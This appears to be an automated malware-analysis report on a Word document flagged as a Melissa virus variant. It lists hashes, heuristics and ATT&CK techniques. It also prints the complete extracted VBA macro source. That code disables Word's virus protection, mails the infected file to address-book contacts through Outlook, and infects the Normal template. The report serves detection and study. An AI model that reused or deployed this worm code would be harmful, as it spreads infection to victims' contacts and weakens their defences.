Office (OLE) malware analysis — malicious · 72239e31ce2b34f6

MALICIOUS

Office (OLE)

32.5 KB Created: 2009-08-22 12:00:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 94af2f8c10814a84f03ee3121a5675a2 SHA-1: d8e35f691d17a5510219ee941618f311c50759a5 SHA-256: 72239e31ce2b34f6a16acd5e54a1414501d0350ef3fba749b3dec130a7def99b

200 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample contains VBA macros, including a Document_Open macro that uses CreateObject to interact with Outlook. The script attempts to log into MAPI and send emails to recipients from the user's address book, indicating a self-spreading mechanism. The ClamAV detection as 'Doc.Trojan.Melissa-23' strongly suggests a variant of the Melissa virus, known for its email-spreading capabilities.

Heuristics 5

ClamAV: Doc.Trojan.Melissa-23 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Melissa-23
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12648 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12648 bytes
SHA-256: `d21d23b2005fe7b34fdc6a1407be85803c1f3538a69432a8d8bce11aaa54c46f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "x" Attribute VB_Base = "1Normal.x" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() a$ = "" hk1$ = "HKEY_CURRENT_USER" sec1$ = "Security" Set prevDocument = ActiveDocument Set nextDocument = NormalTemplate c$ = "Level" d$ = sec1$ + "..." e$ = "Macro" g$ = "Tools" ot1$ = "Outlook" h$ = ot1$ + ".Application" k$ = hk1$ + smo$ + "\" nam$ = "x" I$ = nam$ + "?" aut$ = "y" j$ = "MAPI" l$ = "profile" m$ = "password" n$ = "Duhalde Presidente " o$ = "Programa de gobierno 1999 - 2004." p$ = hk1$ + smo$ + "\" q$ = "Private Sub Document_Close()" r$ = "Private Sub Document_Open()" s$ = "Document" t$ = " " On Error Resume Next If System.PrivateProfileString(a$, b$, c$) <> a$ Then CommandBars(e$).Controls(d$).Enabled = False System.PrivateProfileString(a$, b$, c$) = 1& Else CommandBars(g$).Controls(e$).Enabled = False Options.ConfirmConversions = (3 - 3): Options.VirusProtection = (3 - 3): Options.SaveNormalPrompt = (3 - 3) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject(h$) Set DasMapiName = UngaDasOutlook.GetNameSpace(j$) If System.PrivateProfileString(a$, k$, I$) <> aut$ Then If UngaDasOutlook = ot1$ Then DasMapiName.Logon l$, m$ For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x1 = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x1) BreakUmOffASlice.Recipients.Add Peep x1 = x1 + 1 If x1 > 100 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = n$ & Application.UserName BreakUmOffASlice.Body = o$ BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = a$ Next y DasMapiName.Logoff End If System.PrivateProfileString(a$, p$, I$) = aut$ End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> nam$ Then If ADCL > 0 Then _ ADI1.CodeModule.DeleteLines 1, ADCL Set ToI = ADI1 ADI1.Name = nam$ DoAD = True End If If NTI1.Name <> nam$ Then If NTCL > 0 Then _ NTI1.CodeModule.DeleteLines 1, NTCL Set ToI = NTI1 NTI1.Name = nam$ DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = a$ ADI1.CodeModule.DeleteLines 1 Loop ToI.CodeModule.AddFromString (q$) Do While ADI1.CodeModule.Lines(BGN, 1) <> a$ ToI.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = a$ NTI1.CodeModule.DeleteLines 1 Loop ToI.CodeModule.AddFromString (r$) Do While NTI1.CodeModule.Lines(BGN, 1) <> a$ ToI.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If CYA: If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, s$) = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, s$) <> False) Then ActiveDocument.Saved = True: End If If (Day(Now) + 1) = (Minute(Now) + 2) Then Selection.TypeText t$ End Sub ' Processing file: /opt/analyzer/scan_staging/a46e547cb879473bb3df1f99a574b2c0.bin ' =============================================================================== ' Module streams: ' Macros/VBA/x - 6165 bytes ' Line #0: ' FuncDefn (Private Sub Document_Open()) ' Line #1: ' LitStr 0x0000 "" ' St a$ ' Line #2: ' LitStr 0x0011 "HKEY_CURRENT_USER" ' St hk1$ ' Line #3: ' LitStr 0x0008 "Security" ' St sec1$ ' Line #4: ' SetStmt ' Ld ActiveDocument ' Set prevDocument ' Line #5: ' SetStmt ' Ld NormalTemplate ' Set nextDocument ' Line #6 ... (truncated)

SHA-256: d21d23b2005fe7b34fdc6a1407be85803c1f3538a69432a8d8bce11aaa54c46f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "x"
Attribute VB_Base = "1Normal.x"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
a$ = ""
hk1$ = "HKEY_CURRENT_USER"
sec1$ = "Security"
    Set prevDocument = ActiveDocument
    Set nextDocument = NormalTemplate
c$ = "Level"
d$ = sec1$ + "..."
e$ = "Macro"
g$ = "Tools"
ot1$ = "Outlook"
h$ = ot1$ + ".Application"
k$ = hk1$ + smo$ + "\"
nam$ = "x"
I$ = nam$ + "?"
aut$ = "y"
j$ = "MAPI"
l$ = "profile"
m$ = "password"
n$ = "Duhalde Presidente "
o$ = "Programa de gobierno 1999 - 2004."
p$ = hk1$ + smo$ + "\"
q$ = "Private Sub Document_Close()"
r$ = "Private Sub Document_Open()"
s$ = "Document"
t$ = " "
On Error Resume Next
If System.PrivateProfileString(a$, b$, c$) <> a$ Then
CommandBars(e$).Controls(d$).Enabled = False
System.PrivateProfileString(a$, b$, c$) = 1&
Else
CommandBars(g$).Controls(e$).Enabled = False
Options.ConfirmConversions = (3 - 3): Options.VirusProtection = (3 - 3): Options.SaveNormalPrompt = (3 - 3)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject(h$)
Set DasMapiName = UngaDasOutlook.GetNameSpace(j$)
If System.PrivateProfileString(a$, k$, I$) <> aut$ Then
If UngaDasOutlook = ot1$ Then
DasMapiName.Logon l$, m$
    For y = 1 To DasMapiName.AddressLists.Count
        Set AddyBook = DasMapiName.AddressLists(y)
        x1 = 1
        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
        For oo = 1 To AddyBook.AddressEntries.Count
            Peep = AddyBook.AddressEntries(x1)
            BreakUmOffASlice.Recipients.Add Peep
            x1 = x1 + 1
            If x1 > 100 Then oo = AddyBook.AddressEntries.Count
         Next oo
         BreakUmOffASlice.Subject = n$ & Application.UserName
         BreakUmOffASlice.Body = o$
         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
         BreakUmOffASlice.Send
         Peep = a$
    Next y
DasMapiName.Logoff
End If
System.PrivateProfileString(a$, p$, I$) = aut$
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> nam$ Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToI = ADI1
ADI1.Name = nam$
DoAD = True
End If
If NTI1.Name <> nam$ Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToI = NTI1
NTI1.Name = nam$
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = a$
ADI1.CodeModule.DeleteLines 1
Loop
ToI.CodeModule.AddFromString (q$)
Do While ADI1.CodeModule.Lines(BGN, 1) <> a$
ToI.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = a$
NTI1.CodeModule.DeleteLines 1
Loop
ToI.CodeModule.AddFromString (r$)
Do While NTI1.CodeModule.Lines(BGN, 1) <> a$
ToI.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, s$) = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, s$) <> False) Then
ActiveDocument.Saved = True: End If
If (Day(Now) + 1) = (Minute(Now) + 2) Then Selection.TypeText t$
End Sub



' Processing file: /opt/analyzer/scan_staging/a46e547cb879473bb3df1f99a574b2c0.bin
' ===============================================================================
' Module streams:
' Macros/VBA/x - 6165 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	LitStr 0x0000 ""
' 	St a$ 
' Line #2:
' 	LitStr 0x0011 "HKEY_CURRENT_USER"
' 	St hk1$ 
' Line #3:
' 	LitStr 0x0008 "Security"
' 	St sec1$ 
' Line #4:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set prevDocument 
' Line #5:
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set nextDocument 
' Line #6
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.